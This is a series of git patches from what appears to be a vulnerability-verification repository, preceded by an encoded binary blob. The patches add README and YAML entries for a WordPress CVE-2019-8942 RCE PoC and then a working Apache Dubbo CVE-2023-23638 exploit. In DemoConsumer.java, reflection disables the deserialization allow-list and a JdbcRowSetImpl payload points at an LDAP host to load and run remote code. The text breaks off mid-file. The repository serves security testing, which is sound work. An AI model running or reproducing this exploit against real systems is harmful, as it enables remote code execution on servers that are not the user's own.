z)E}T!(vAph&3`Akf-v~rWXKIY#?0J|?}YJn=GU{X*@#~SyLc@4Xiw4I>RYIZnQccG z+>IL^-QI~(7%TMWdgknF9J_dThfA`PMQ=NJ+XJi$>{#HGMi+LveuiR`cThGg_qI z(T%CLNd_zw^QB0It|s^4EX=32-ZLYT#)ob-sQYnKq{%-QX`bYgcG?@X1vUx=6{MHjZ*U0qm6C!=-+uFi%js zak-QTJ=wq8J3IYuSq&9WcoX{MyXl6P%i3jLgXON7QC16j_WpsesOHfe-+6HXksezH3XYCT#gSHjmvV z!EAK|qm~9BUeTBJe6B)6{xk3iKr+FIE(p8GH-w+N#2>QXmy4DojzDpwK#I%tdlO7a zQ?Wn3QsuLY&&lUmljSAD>Br&470LOton7r126zwp0FH24^IkEPSrYCCV$JP>3dy?`(Xs}8Hzds)P%4e9 zoR(4n8RtKJZ}YCHrI}@79Qe|UTr*lJ8Umh4i-sPQE#{X0nWHwY7Sc1b*^%o9T#R_o zwJHs&UI7&(8Tko$pTY>vv!h+4o5LewKf67MsuWhXRJY*~mtz0J9Swa~`mQB!uN+u^ zA2p0%!MM;|f8Sx>dhPS=4%I5*xa(uWsoIF}BZDi)hJ}|*vvsN8I4C%}a08``?#TFL z5FG4}{`0F%^cjL@n#1}%qM9$KbQgA4S6+r3A2|g6Kx-fro=T1DB?xWV-5E&JalSm+l$d+1IO{Q5PjD4&^wy*(1Q zP8Hh2P&K~z8oRafSX?UI$opy(p>)n&r^|F<2dE+HnpR{LOV)GHWHVQW1 zP8%<2#Lm4;(4(!9^5lkFePN`pTHR-FB7CT{`}d90?Og@xJOv7;b<+t+POIQlLG;jJ6RTB98l?6BF=c{EmuVjBuAt6XPusVAz2UE?8 zYTF}`YC^V6Y7pr49(L}%T~2*cuj}O)+NF9q+XeO8!67}W8)FCflQq(?(9rD!nG0jx zTZt4EotoxMp4M}*)v`A)_hpETR)saGgcU$LMgWD8O?$AJ9_d9|U-xLqG7zBTS}Syo zGHK7mQhimbQXby9k+bjoH&C;5mX!HZW@3$aK$M(ON&2X^CFkP(OaZJgya|q=N{>yz zbI5iRM&;FmWbN|`y57VFE4qtC(>r~lsvTcSwP*6nfz?fWa zhYv4FT?pK$qvdq5J8KdF1&5ZLSSZi?mdDilF-NiMNpb?R5QaVeIU>MzD!c>q`0dBZ zeXh@+Gy)Re8VDZ^u{z?%-h)_vUOH z71}kz&;aD#4oe2jVCVX4fIRi+g6_U_yZ+vImo8XDKqcNQW=0=<+J5UMTI36<$>Y44v zrp;_pD4+K1%@(1Xxj%~vkEW-nFQMKMl;9va-vI+9jPT~BA530P7rMzeR;{d=ie$fX z!{~Efl&r@gBuGKe@~fTXM^`z127bW-N`4y;X&#)88Yy8+!EyP^+g_B^?FctYt9sq6L<3SBUE z2a5Ws-aeN{K zI1OSYu%wR*HPFtN7L`%bRv+l*6HhgJ`Cs!)PZcJx3c6p3CdHcHDSRpwHjJdMw8F@q z8)VwzV(8a17!}|e#r9aYL7QP~L$%MRblNM6utTrR658hi{?0udqc%zxMy3`7^_JM@w5BefoxZoGj99YqH+=OQ?lZMq)m~)xqhY6Q zKhLNKo;d?Q(7eobp50drKelibIQIn$H8|%*8ev6;+kUIPsE$w`{_=%ALCik8ms|hY zspK^m{~N_I=8tw9&c)5N9an)=KZIfJkzq42=KRSDltF z>V8hf@BWzhUlLx1vp#;CAi(|{_o;^Y4J7eFL^b76vmHH=ov*#KOX5!OS zZtlaZy{C+3cM+r7VJ8>KUq1%%m<6aDmbsW_7WP+ez^21x<$0SKF_%9LLWA!>5*^Zf?hy~+} zu8lhl5kA2-abykRI+^IvFtvl1zB8(fPBls&7HEom59#_8Ga@JdRN2XcgTgF5aLf;P`Kk6&cj-UDHrwmD-9i^;TFqdafQe9C!rS z@4@o6IFtYj;NhKI$H(gaed!M>aKrcPpm+~wA2~Nhc_8FJ{NM}|C$Leh1LNaVNKTuw z;SVW{W4h6pz_3lNgSNbTcvPg^8Q+NVD`kDFtEY|c%+@SVQ`sSy&clD}vwuKEMdbr1 z(W+f&P0&azy~TuFmwx+sbb(fVz`)Do*{`&|!dI$B#gXMCETCw+;lH>$oJHI2tQUmn z_I?z9kX;lV-1JM%vFFhTxp{&-{4BQP3>HavoNap_Nn%+{KdsgrNLNy7^_{gjzEPw$ zY+x zYVlvbvb-_yD#`iFRXz|UhwZqExP?dza_3|!5K{1)(I-1Qp9#*@P9r+>+3FE#?+7d^ zWmMZQnJEat6*OELqf0YOkxylK|0J4puXL=<+v#vL7C^z4+#d_5jP$@#9P^@t0j1)G z&UEg`QH#>z-q#hgrr{ccXIN0x#kN}=SuRm7!INYhKN{KX0jH^zB($g%-o3EbTt2cq z<3harXLhzP#75ZX6Dd2A<#gKwAO|*t(Tt)f*&9ZYG|Sa10IE=sC-S2)Vcf^AImQa@ zd2^8lI6|Upt?n?RMY;d0E10S!dUPOYOqeUV_ zNXpME{N>ia;3Wa10!U@px;a8`U`j9;u5|iio(Bh&ud{H3^;7EgajKn5qQ3h{$#?0| zYreOAT}0c!eH8nOxsXaNG;afoKOgcf232-x8A+@xryrcE!Jjql+?wqx+2+4x^x11# z94ikO1NAQ09w_W5mY2?6-1ZiaPS`}L$zBcO>i3t54(mx0pZgT=;A_AQIap_MAr7@} z(7k}a&~Eof9hvcP@qU@&l?&2&7jUP)pVE){dXIN0z5U^}a$a+ly;b)~txVoK`H9H} zmr6TIem%0TXqcS5Uq7`;O6Td9lNl&0%K51>Oz;hy-v5HFfpyFYkrDCSvyt)EJtd`o zd4%(G*JD<1=!vfxIl0qLZyxanVS ztDgv7(AsKATOCY~Q=fhc#yfI=KHQgA83k?U(Y+J~J;b<8cHGrUPo7(5eh896JU!Fl zlb|=AH69x=nLqm9!w*Fc@!+cX!Ki!7D2|ebCeG`RUuTM%#ceuhNLYj%4CRvrcUb#_ zEQ?yBLh$WRm6^g$Ce%Na<7sWez>FD?3_@!jU>kku?TyrO$v)`U^jPjEXrJ4vX=&U| zH7ZBA*jV=u_of+{^mB*qbPc%7Gi2nsZlc1A`{YV*hf_CSM9=XS9ho<7w%1`%cDQj= zrIrbyUj`x;ZR6ouKiXvIm#MoG$rNe9`+*U+gN`oUJHmO>vPtvFz?x-sb#*qU!v4&j z3Zs?|J#`_7ab4ghleM0@*`4{9rfOsh=V2^c1VZ? z$*Buln@JaWN#gjT_;CjoACj5;Mltj3hq3q5MQ#MC))mgDUe#MXa0HKEuupO7^w+|iH zLcr9JQ4jQea`Dr{&7Gbgb#0yNPxCiE$fX_mbi@IAK8z(XHR>C#cE87y7~U-hhMS5S zTt7u|t9h+&S$|Yo-`erK3Y++eAc%T*(arM4nIm9&k0v7)t`Ifhy5!oDbpwqgFBc^q z8gc!Kc3OEV`H1S!;##KLEtokXNO^W>zf zL3hbab`Xc}i@mB0cu}m4hw9RnY5Sl|J4-wS`WURK zMPPq&?J;ma@B?!M3)$TU%9r{4DTrg!Acua!{yY>FK%zZ(q!q_7msk4p@G)x-fm8vj z@4_AnZ3K%BBEdCBH&IKnYF>#D8<=C)nqFOBpus21uQ{#opdiTL$;jW<{~aspbf0Rq zsE{57q1$|GQvr_9WPjA^XPz-rRO1^rMm^(lY6+3Ot#=}A*|LgP5A^#Ucr$Qq`hd{h z6TqzqV-H}Xa$N3mEzc3p#lc^P6+EmTgOam&_@{3Bgbp<2`~_hec5r-+#aLGiePDhE z;VJ_}+u!{;pwp-(^JU!r8>U#V)7tH8`-F*G;m_T`#$;-6ua%a#kxo;?n3ZttYH+VD zpPM+|Kb66npH3Es6p_1F!l&VkxZ9#|6a7f-sLR&lsei3%N8RK zxR3Q70TeYlL4wDuhB}YeE=ho&HW4`9#FkCbr=+;Nul7Bk#T~n%c_oV+Gg~Gf$iZmE zlAhHs91949p8=1~+r^2=r+i;JQ>$}hXY3Smv_I%MzaN=TBg+qyuEhv4&1Z=~UI$zb zOn_au{w++Fx~THxS0gU1wtO%ylt2RPZTZgQc7z=;u8xR&=@ z<($9f;2z5IVu9%C3HRz;_x3;s#fY;7P`CF@@=3R{L~;|jtNOIo6py62iYBwAYF*Gy z3sLI3-C$_8nDQTs1T#uoWOBg zPnqK2o>OG~^@u*rXhD!Z?3inFL+pp0rr1%Z z6WW+{Y94933zrdfuAa*Ag}^nBJoqv2g7>N-7n@=9_d(e&CSs}u%}+E3&SkSey2c(X zh=5s0_7c7?kROoXR^GmBBFOQ%xveo5tRLaN0WH}!$bBa!*Y+XbuZ8NoSkEq|Ml5lg z;+c%f4Rw30a`IP|pp=X8Vk|4WrY3c(kgZJV!#@yj7@)8aP4Hoy24Tx;S0In#u-rB{ z=Qnto2hzD3JLG)iL;rOpmL>5%6S(ufX9i9>N|HH@;}3-8EIKUeGwmlSx}U8prPZc{q_*-xYBETe%XuyO>}_8h14)IFxtV zf^C4dT6S?D`0yH$h*s%N82N$~6675$Hi$=Qn_m0Vn$swcqntUbsW{A=lC}$+vrX`? zT(L@h=%M6&^XJcQ7iXzh&Yzb+ZmpLx*?~{+l*YhxV?aeSytnIu*6=CkkHU$uS2+c{ zm7mbeSCj zJhfEiklv`ZFm1);-ljpx6{2r=81GayFyUmtFhwnd!*jFTo+nyf{qkH|>GHJv-xv92 zWaO?VX?v5Eid@`F3f+F}d8`&EU?jouIhHHTofvB_6WSc3>Y^OnY8srCH3Y$G!)2+f zNf^0GcObC)5r5&kwF&65yYpR9JnDV`z=7-`X}&rZWVr4@pyKyt7-em|Ze}HDo<+~3 z6Ju|aZ>HLgOKYo`-@5)J%P6E;-U#>CS9o%Vi>6O1`C^+caq~M|nSSA$!L>lCKq!7G<-IKHNpWYp2X41Pe)Y-5u0K^-3@gU;!W;%I!z!d@G$QaWX5c71u+ zU~i;lhvj!K2!NC7V6{=tZzgslpmdhX4vF|IN_}(f=coIp9&bc5eXWOm zWTT%gb1tXn6bqd%iy1nMZf0`E(@gs^flF{bz{yz}93ppS(m{CNemM<1(qKm$KO1oOf2404RCp0eEY3f-JEh_a1x_|>TFJ_UXE2W&H?A^I=f}bN zT(GV?SWd7LglbP0CSYZvzJ-Zqh>2I$rn7IcY6R6-X`$gO=XSs>kIWP-tW6t(YSzVy zv?&0oUF}x_fYy3JHO>(<6I#64pAq-<-*Gr5T8uP$v@l zL!)5Jl$&Cw2>g=!6-6H{6XityvLAxVk&equ5N_l{BnE69|Kh2AWfY=mEZCd)m|0H+OLQ?i-zkdu$#V`4Qm?xrerf zn%@0Niu4j+UvCf`T*?{$pHt2jt{S@;L$lhmpp{P2#e=lfjvN>>XQ<2L#i&rRUU4?o zUD~Pck3YtDkgcEAB#>2og55d4 z--PuQXH~VIRc^mesN>i$p`P2T7^5#p-wAvV&U3-<5$)KA1KbM6Qdcg=mz$8BWvlx#4ImW=0E zQnd$cyr71P+q8IFpMy^N1Qq$YH>6fEb^XsQQBgxux=@WX$OXvI76v!qzk%m$^^EsX zTsLmq^$`8`5_~O279qS89X9udCR~4fsH#8Lt?@T~{MwIh3|9U=(Pq>#+ek~@Avea+ zl;ern)l2v_SO@$f)wb*P5ts-DP7BDQT$CZ@W*l0zWUL5wmTg@&^m=3e8_LGL)TY85 z!m_~i%rxj~o{yPQG`_E&IQi&%-ugS2M(wsP)|}XL0xdI2)a|`RMrE7miMTH?8H}CU zgm!{H%7z?je$wRUr|z)oqFan_Dzg}HqqC~ba zJV?XM^&%d#o{`zoF#Y${8ZuX~q&jTfdDw4Rj52JWdmQ`sLL*EB{1Kq27!WrruoroofOW(I2S+BxBwpPhcRu>!Y1(^1&-1C7o=76AKYLbK}O&C#8o zC_zV7mRF{Q5x0Ps3iHv3lLRn?9gyqo#!C+&DNrJhlPAj^`9zfZck`{#)Te)K^yc_J zE8BkUp0gyslSb|alJM=G;Al}Z`S=#q>5C_a%g->Wi(N@Pv-AD^e-vI<|8Dpi{P{`2 z=G8I?h=mHYDbe)+6Y?(uCz^f_5s~nqbe|>ogS+ZUM{YNtyEeb1qJxrnWZEZJ@-~gY zr=Fvp_eOw`TWe}MXgsezQJHw9Y7Xg3+Wjl;5zJV=113TrV)x1z)$n7?{x(t2&rtuq zDKS~S@@o?!;oh=mgJ-s7xlG#?{oIBtix3rdev&L*mGK^X7movh>}tt|;NjI_cw%Ral(~kke|4 zKt7igo6VNxEn)l3S+Szu>rX}UtxL1LH(_w z6>NK;`qjbYq|6cU`A^XWe~|2fENWqojAZje9dJ;tMn>9AI~@+mY4O8jb@091imdzp zKup0e7ce^y`r^%cvTkV=_^QnD*rj^y_#MJQ4lmNX8EHH7a?h~!u`P5{h!lUFh_dz$ zJY1$?Etw&u1<;>(M@B2i^Q4QOQ(N8SAu9>-V@MNJR1yMh&%7d>Nlu5zsFcHsfF)x;Anl~GX4v2nZ$nK87V9Ll+A zY=^Bwa=d7b%8`Ztpn)<^KyhKypVp|Z#c-osX_FZJs3~bdZIZqqSZrCXRn|i>zG-7; z;bL2i8T#)K*8hB;$AdN&-~|{h;aG2AMxE?ASWVD2U_-uEKCtr3Vm&%_$T|OlRdM?I zti+){*^e%Y*vqE|$Bt0cv&cA@i+ue1e9GkE1;%7`MLiI2xO?X8K0Z#d06MjO6x)G< zbKcdti@{PedzwVnb$B1y*EhZ5zIY{rs=JiC-lRbn3Ez|ZfqE9Po&4xc#)hU>D|HjR z)|Ip7ge-iACHPnlnP7AhH+J;?KafE`@E}~W?41Prr3&mPc;>yaUtkzSXnOFtpllU& zcTGQn)gTzZf~5MUKo|+M2D<1XX%81rLIxXHF=T^e)q2I8n}2Z3i1O&m*oYu|r$K@+ zc&#c#ooxo&ga@Z5Kl*5QQJ~t+j6itAa#nh#_VA88_Mu$b>U$M(lOpT=9*+yOhAwv$ z-D(lk;;ws~`cY((j;}-h4Omqqgkt)|>PO!k4bpd%{*Pd^e_aay|MUNT4> Date: Fri, 7 Apr 2023 12:38:10 +0000 Subject: [PATCH 026/109] add cve/WordPress/2019/CVE-2019-8942/README.md. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/README.md | 29 ++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cve/WordPress/2019/CVE-2019-8942/README.md diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md new file mode 100644 index 00000000..c248bbac --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -0,0 +1,29 @@ +# CVE-2019-8942 Proof-of-Concept + +### Overview + +WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943. +For a comprehensive understanding, check out the accompanying [blog post](http://blog.nsfocus.net/wordpress-5-0-0-rce/) for in-depth details. + +### Dependencies + +* python3 +* requests package + +### Usage + +1. Verify requests is installed: +``` +sudo pip3 install requests +``` + +2. Modify the url_root in poc.py as you wish: +for example: +``` +url_root = 'http://localhost/' +``` + +3. Run the PoC: +``` +python3 ./poc.py +``` \ No newline at end of file From c0acd0e447225a71dd2fdcaced96deebcfe6d273 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:38:40 +0000 Subject: [PATCH 027/109] update cve/WordPress/2019/CVE-2019-8942/README.md. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md index c248bbac..00668b78 100644 --- a/cve/WordPress/2019/CVE-2019-8942/README.md +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -17,8 +17,7 @@ For a comprehensive understanding, check out the accompanying [blog post](http:/ sudo pip3 install requests ``` -2. Modify the url_root in poc.py as you wish: -for example: +2. Modify the url_root in poc.py as you wish, for example:: ``` url_root = 'http://localhost/' ``` From 729d3ce610623b1dbfa2eaa3a3285fefff46d9df Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:40:07 +0000 Subject: [PATCH 028/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/yaml/.keep diff --git a/cve/WordPress/2019/yaml/.keep b/cve/WordPress/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b From 4d3e5ddfa2acb5e42781b87c119af56e93321243 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:56:07 +0000 Subject: [PATCH 029/109] rename cve/WordPress/2019/yaml/.keep to cve/WordPress/2019/yaml/CVE-2019-8942.yaml. Signed-off-by: bbj --- cve/WordPress/2019/yaml/.keep | 0 cve/WordPress/2019/yaml/CVE-2019-8942.yaml | 21 +++++++++++++++++++++ 2 files changed, 21 insertions(+) delete mode 100644 cve/WordPress/2019/yaml/.keep create mode 100644 cve/WordPress/2019/yaml/CVE-2019-8942.yaml diff --git a/cve/WordPress/2019/yaml/.keep b/cve/WordPress/2019/yaml/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml new file mode 100644 index 00000000..b2d43e43 --- /dev/null +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-8942 +source: + https://github.com/synacktiv/CVE-2019-8942 +info: + name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。 + severity: high + description: | + WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because an _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943. + scope-of-influence: + WordPress < 4.9.9 + WordPress 5.x < 5.0.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-8942 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-8942 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: RCE,远程代码执行 \ No newline at end of file From b84ae70bb0b392562f6531d7090c47585bef7967 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:56:28 +0000 Subject: [PATCH 030/109] update cve/WordPress/2019/yaml/CVE-2019-8942.yaml. Signed-off-by: bbj --- cve/WordPress/2019/yaml/CVE-2019-8942.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml index b2d43e43..4223ef65 100644 --- a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml @@ -18,4 +18,4 @@ info: cwe-id: CWE-434 cnvd-id: None kve-id: None - tags: RCE,远程代码执行 \ No newline at end of file + tags: RCE, 远程代码执行 \ No newline at end of file From 56752fa5c04d8af0ebcb993af5f94eb959302867 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:58:19 +0000 Subject: [PATCH 031/109] update other_list.yaml. Signed-off-by: bbj --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index d3ae8268..5e9b12b0 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -54,5 +54,7 @@ cve: - CVE-2022-2555 Zyxel: - CVE-2022-30525 + WordPress: + - CVE-2019-8942 cnvd: From 4fb3f61e62af9d435f56abb8d8e2bd566b24c91f Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 13:03:08 +0000 Subject: [PATCH 032/109] update cve/WordPress/2019/CVE-2019-8942/README.md. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/WordPress/2019/CVE-2019-8942/README.md b/cve/WordPress/2019/CVE-2019-8942/README.md index 00668b78..812c6782 100644 --- a/cve/WordPress/2019/CVE-2019-8942/README.md +++ b/cve/WordPress/2019/CVE-2019-8942/README.md @@ -12,12 +12,12 @@ For a comprehensive understanding, check out the accompanying [blog post](http:/ ### Usage -1. Verify requests is installed: +1. Verify if requests is installed: ``` sudo pip3 install requests ``` -2. Modify the url_root in poc.py as you wish, for example:: +2. Modify the "url_root" in poc.py as you wish, for example: ``` url_root = 'http://localhost/' ``` From a78c22a48dab7dd4dff1866261b03489625207ff Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=B4=94=E8=8E=B9?= Date: Fri, 7 Apr 2023 13:12:41 +0000 Subject: [PATCH 033/109] update README.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 崔莹 --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 7c9db687..0f2cd172 100644 --- a/README.md +++ b/README.md @@ -33,12 +33,12 @@ git clone https://gitee.com/openkylin/openkylin-exploit-db.git 4. 新建 Pull Request 由于未公开漏洞危险性,我们将严格按照[openKylin安全漏洞信息披露政策]()对漏洞进行处理披露。同时我们采取以下措施来对贡献者贡献的漏洞信息进行处理。 -1. 我们对所有来自贡献者提交的Pull Request开启了代码评审功能,开启的代码评审(Pull Request),仅管理员、审查者、测试者可见,保证了当前Pull Request信息的安全。 +1. 我们对所有来自贡献者提交的Pull Request开启了代码评审功能,开启的代码评审(Pull Request),仅管理员、审查者、测试者可见,保证了当前Pull Request信息的安全。 2. 当贡献者提交issue时,打开了内容风险标识选项后,当前提交的issue非项目成员均无法查看,保证了当前提交的issue信息的安全。 同时我们也建议贡献者通过以下渠道向社区贡献未公开漏洞: 1. Psirt邮箱 -psirt@lists.openkylin.top,您可以通过E-mail将openKylin相关的安全漏洞情报、信息反馈给openKylin安全团队,由于内容比较敏感,建议您使用公钥对邮件信息进行加密,[公钥下载链接](https://kylinos.cn/upload/psirt_kylinos_pub.asc)。 +psirt@lists.openkylin.top,您可以通过E-mail将openKylin相关的安全漏洞情报、信息反馈给openKylin安全团队,由于内容比较敏感,建议您使用公钥对邮件信息进行加密,[公钥下载链接](https://kylinos.cn/upload/psirt_kylinos_pub.asc)。 如果想要项目提供暂时未有的公开漏洞的验证程序,也可通过新建[issue](https://gitee.com/openkylin/openkylin-exploit-db/issues/new)。 @@ -47,11 +47,11 @@ psirt@lists.openkylin.top,您可以通过E-mail将openKylin相关的安全漏 ### 贡献说明 1. 提交漏洞验证程序目录结构:漏洞编号类型(cve、cnvd)/软件/漏洞年份/漏洞编号。 -2. 提交漏洞验证程序需要提供漏洞CVE-xxxx-xxx.yaml文件,项目根目录下提供漏洞模版.yaml,内容包括但不限于:漏洞编号、漏洞等级、漏洞简介、漏洞类型、漏洞检测程序来源、补丁链接。 +2. 提交漏洞验证程序需要提供漏洞CVE-xxxx-xxx.yaml文件,项目根目录下提供漏洞模版.yaml,内容包括但不限于:漏洞编号、漏洞等级、漏洞简介、漏洞类型、漏洞检测程序来源、补丁链接。 3. 提交漏洞验证程序需要补充项目根目录中openkylin_list.yaml或other_list.yaml文件。 4. 漏洞README.md文件,需要有漏洞验证程序的详细使用方法。 -注:贡献漏洞验证程序如在openKylin发行版上测试有效添加至[openkylin_list.yaml](https://gitee.com/openkylin/openkylin-exploit-db/blob/master/openkylin_list.yaml)列表中,相反添加至[other_list.yaml](https://gitee.com/openkylin/openkylin-exploit-db/blob/master/other_list.yaml)列表中,openKylin发行版下载[地址](https://www.openkylin.top/downloads/)。 +注:贡献漏洞验证程序如在openKylin发行版上测试有效添加至[openkylin_list.yaml](https://gitee.com/openkylin/openkylin-exploit-db/blob/master/openkylin_list.yaml)列表中,相反添加至[other_list.yaml](https://gitee.com/openkylin/openkylin-exploit-db/blob/master/other_list.yaml)列表中,openKylin发行版下载[地址](https://www.openkylin.top/downloads/)。 ### 免责声明 为本项目为[openKylin SecurityGovernance SIG组](https://gitee.com/openkylin/securitygovernance-management)主导建立的漏洞验证程序仓库,仓库内容不代表本项目团队和openKylin社区的立场及观点。由于传播、利用此项目中的一切内容而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本项目团队和openKylin社区不为此承担任何责任。 From 7b268e33cd5a6511fd137e0aac69345cf52e7abd Mon Sep 17 00:00:00 2001 From: zeroc Date: Mon, 10 Apr 2023 10:36:15 +0800 Subject: [PATCH 034/109] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23638?= =?UTF-8?q?=E6=BC=8F=E6=B4=9EPOC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2023/CVE-2023-23638/README.md | 7 + .../2023/CVE-2023-23638/poc/DemoConsumer.java | 51 ++++++++ .../2023/CVE-2023-23638/poc/DemoProvider.java | 18 +++ cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml | 121 ++++++++++++++++++ .../2023/yaml/CVE-2023-23638.yaml | 22 ++++ openkylin_list.yaml | 1 + 6 files changed, 220 insertions(+) create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/README.md create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml create mode 100644 cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/README.md b/cve/apache-Dubbo/2023/CVE-2023-23638/README.md new file mode 100644 index 00000000..f267cc7b --- /dev/null +++ b/cve/apache-Dubbo/2023/CVE-2023-23638/README.md @@ -0,0 +1,7 @@ +# CVE-2023-23638 + +dubbo泛型调用存在反序列化漏洞,可导致恶意代码执行。该问题影响Apache Dubbo 2.7.x 2.7.21及之前版本; Apache Dubbo 3.0.x 版本 3.0.13 及之前版本; Apache Dubbo 3.1.x 版本 3.1.5 及之前的版本。 + +复现时需要为 DemoComsumer 添加 VM 参数: `-Ddubbo.hessian.allowNonSerializable=true`, 详情参考 https://su18.org/post/hessian/#serializable + +POC 的本质是利用某个 class 修改 properties 以绕过限制, 代码给的是 JNDI 注入, 可以参考 [CVE-2023-23638 Apache Dubbo JavaNative反序列化漏洞分析](https://mp.weixin.qq.com/s?__biz=Mzg3OTcyNjM1MQ==&mid=2247483788&idx=1&sn=7954ad20fec203469a13a09050536a1c) 自行修改成反序列化的利用方式 diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java new file mode 100644 index 00000000..6349f728 --- /dev/null +++ b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java @@ -0,0 +1,51 @@ +package org.apache.dubbo.samples; + +import org.apache.dubbo.common.utils.ConcurrentHashSet; +import org.apache.dubbo.common.utils.SerializeClassChecker; +import org.apache.dubbo.rpc.service.GenericService; +import org.springframework.context.support.ClassPathXmlApplicationContext; +import sun.misc.Unsafe; + +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.util.*; + +public class DemoConsumer { + public static void main(String[] args) throws Exception { + ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext("spring/generic-type-consumer.xml"); + context.start(); + + Constructor constructor = Unsafe.class.getDeclaredConstructor(); + constructor.setAccessible(true); + Unsafe unsafe = constructor.newInstance(); + + Set allowSet = new ConcurrentHashSet<>(); + allowSet.add("com.sun.rowset.JdbcRowSetImpl".toLowerCase()); + + SerializeClassChecker serializeClassChecker = (SerializeClassChecker) unsafe.allocateInstance(SerializeClassChecker.class); + Field f = SerializeClassChecker.class.getDeclaredField("CLASS_DESERIALIZE_ALLOWED_SET"); + f.setAccessible(true); + f.set(serializeClassChecker, allowSet); + +// SerializeClassChecker serializeClassChecker = (SerializeClassChecker) unsafe.allocateInstance(SerializeClassChecker.class); +// Field f = SerializeClassChecker.class.getDeclaredField("CLASS_DESERIALIZE_BLOCKED_SET"); +// f.setAccessible(true); +// f.set(serializeClassChecker, new ConcurrentHashSet<>()); + + Map map1 = new HashMap<>(); + map1.put("class", "org.apache.dubbo.common.utils.SerializeClassChecker"); + map1.put("INSTANCE", serializeClassChecker); + + Map map2 = new LinkedHashMap<>(); + map2.put("class", "com.sun.rowset.JdbcRowSetImpl"); + map2.put("dataSourceName", "ldap://192.168.100.1:1389/Basic/Command/calc"); + map2.put("autoCommit", true); + + List list = new LinkedList(); + list.add(map1); + list.add(map2); + + GenericService genericService = (GenericService) context.getBean("helloService"); + genericService.$invoke("sayHello", new String[]{"java.lang.String"}, new Object[]{list}); + } +} diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java new file mode 100644 index 00000000..bc872532 --- /dev/null +++ b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java @@ -0,0 +1,18 @@ +package org.apache.dubbo.samples; + +import org.springframework.context.support.ClassPathXmlApplicationContext; + +import java.util.concurrent.CountDownLatch; + +public class DemoProvider { + + public static void main(String[] args) throws Exception { + + ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext("spring/generic-type-provider.xml"); + context.start(); + + 